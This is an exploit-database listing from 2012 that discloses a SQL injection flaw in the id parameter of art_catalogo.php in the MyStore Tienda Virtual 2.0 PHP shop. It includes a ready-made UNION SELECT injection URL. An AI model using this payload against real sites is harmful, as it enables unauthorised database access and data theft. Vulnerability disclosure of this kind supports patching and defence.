MyStore Tienda Virtual SQL Injection Vulnerability



EDB-ID: 18306 CVE: N/A OSVDB-ID: N/A
Author: Easy Laster Published: 2012-01-03 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
   
 ~ SQL Injection MyStore Tienda Virtual ~
   
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
  
[+] Autor: easy laster
  
[+] Vulnerabilities [ SQL Injection ]
 
[+] Page: http://www.mystore.com.mx/ 
 
[+] Language: [ PHP ]
  
[+] Version: 2.0
 
[+] Date: 03.01.2012
  
[+] Status:vulnerable
.-=--=--=--=--=--=--=--=--=--=--=-.
  
[+] Vulnerability
  
    art_catalogo.php?id=
      
  
[+] Exploitable
  
    http://[host]/[path]/art_catalogo.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11--+






Comments

No comments so far